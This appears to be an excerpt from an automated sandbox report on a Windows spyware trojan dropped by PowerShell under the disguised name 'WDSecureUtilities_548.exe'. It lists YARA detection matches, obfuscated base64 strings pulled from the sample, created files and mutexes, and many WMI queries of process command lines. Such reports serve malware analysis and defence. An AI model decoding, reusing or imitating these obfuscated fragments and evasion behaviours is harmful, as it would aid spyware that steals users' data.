            Source: amsi64_8016.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 8016, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: WDSecureUtilities_548.exe.8.dr, Yribalinuno.csBase64 encoded string: 'OBgWWgYCH09JDEQbRxUfC2I6MH1ZURdEFH03CQQdBgAMSjVQDRRWVRJFCQ==', 'Oy81fCAlTDYGGhkHBxQrBwYPWX8xPiFVPh4aVVsvNxwHCRxKEFE7PSwlMUY5AggNDRkKcAdRUVU='
            Source: WDSecureUtilities_548.exe.8.dr, Sevucohyher.csBase64 encoded string: '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'
            Source: WDSecureUtilities_548.exe.8.dr, Gyvikecapit.csBase64 encoded string: 'ICE8YDwyOSc7MjoyNiU0Kzo2KlYFBRsUGxIoMAgcEQs0OQ1cAhw='
            Source: WDSecureUtilities_548.exe.8.dr, Ecunicihimi.csBase64 encoded string: 'VFUBVA9RGhAbBB0JB01FX0ZaWxlcT2F/VSUnJzkRFQ8FDw1cEQJMDQQbGhVTCBQHVUgRTRcBVlpGAAMRRwdUQAcYHhZRQVxERi85KjoTDwsFC1RQDQIYFAcUEURJCAoCBhlDQRAVUVcBAwAWU19IGR8dV05QXwMHDlhGVllBSDYlJipaCxQBFEtJeWxJUFsrEBoWVwYfGEsoJjUkVV8iFhgFF1wNBVJ4Y1dUWiQfAxsEHwoHFRtdFFsORAwqQDAJMT0gcgwVKjheIhwpLh00DyQeMHYIKwoyUT5FLT4dADxcIS1+AQUEET4gDgo5IhA8AxMuTRABWVosBRpeWh01JgUDSm9MEiY4UQFAISMxTDonJyxIO0A8Hl4lLE0zISYWLl8Jf0g6PkUdBzgpXCcTHiEcTAo1Pg0vGR8mBydbCSgLBAh9M0YAHQQiOT4xHClaIDlKaDspHTQ9EkwVKgAMU1RFNFYHBAAAGkl5bFVfNT0pOhhLAhwJAQwFB1g='
            Source: WDSecureUtilities_548.exe.8.dr, Ulehivonobu.csBase64 encoded string: 'JQUDUA8dDVpcWURGQScOAAwFDkpDPzhVX1lFXUknKDleXlAZIgEcGQwgEQQiGRNBXlpLF1BGTF0iPyArJVxHAgEBHBkkFA8eBl5UJQECCAMNRU0ATUFCRF1FRkhaSV5OOwsfWBEYQ0NZRw=='
            Source: WDSecureUtilities_548.exe.8.dr, Vyxilyxiviz.csBase64 encoded string: 'Jh8UWwYDVlUSRwlrYyALDwsPEVYPFQkHU1cPVxR9bSsQGhBLAgUFGgdNVB1bDUgVWxd0MyEDAwIaEgZcSQtTE0gcAgweUUQOXwpd'
            Source: WDSecureUtilities_548.exe.8.dr, Dogacocaguc.csBase64 encoded string: 'Oy81fCAlTF9JMSYpJFAwBwZZS2YzAwMWDAQHRj44IjwtSilLDBIJBho+EEZUUBxeFQ=='
            Source: WDSecureUtilities_548.exe.8.dr, Rudupulygyt.csBase64 encoded string: 'QUo4SRMdCSIMFT8PHV9SXV9ESg9DWSc9PTo4SkkcDgUNSj5cABoDXEk='
            Source: WDSecureUtilities_548.exe.8.dr, Medecorysiz.csBase64 encoded string: 'PRoeSwIVCU9JABEEGh8EBQ0edDMgHgIbDBQADwYeXU49Gh5LAhUJeGMkEQVEJwIMOwUaUgYFQT4MDk5GDTcPAiEiN1EBKS4GMyQ2EwtCUgQyO0QEbns/EApaIwMLIwgNAw8NFDUUHgYAGBpcSUFUY2Jncw=='
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@15/9@4/3
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:120:WilError_03
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeMutant created: \Sessions\1\BaseNamedObjects\Idegyvenevikoguhucifavolomoboby
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7916:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dlw22fuk.nbi.ps1Jump to behavior
            Source: DBp7mBJwqD.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3444
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1288
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2580
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3432
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3000
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2136
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6444
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 408
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5148
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6440
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6008
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7300
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3420
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6436
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4276
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5568
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4704
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5996
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 560
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2544
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5560
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6420
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5556
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7980
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5792
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7276
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3448
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6412
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3768
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7356
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1668
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2528
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5112
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5716
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1660
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1228
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5968
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6828
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5532
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2944
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5528
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1216
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2508
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 352
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3796
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2932
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3360
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4652
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5944
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3788
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5080
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4648
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4212
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1624
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1192
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3716
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3776
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3692
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 324
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6788
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1184
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2044
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3628
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2040
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 744
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6776
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2132
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5480
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3808
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5908
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7200
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4556
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1164
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 180
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4088
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2452
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2020
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6756
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2012
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1580
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5456
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 496
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4160
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5452
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6740
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6736
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1132
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 700
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1992
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1560
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2420
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5436
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7156
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 516
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1120
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2412
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1980
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6720
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1544
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2612
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1972
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4988
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2832
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5416
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2828
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4120
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6272
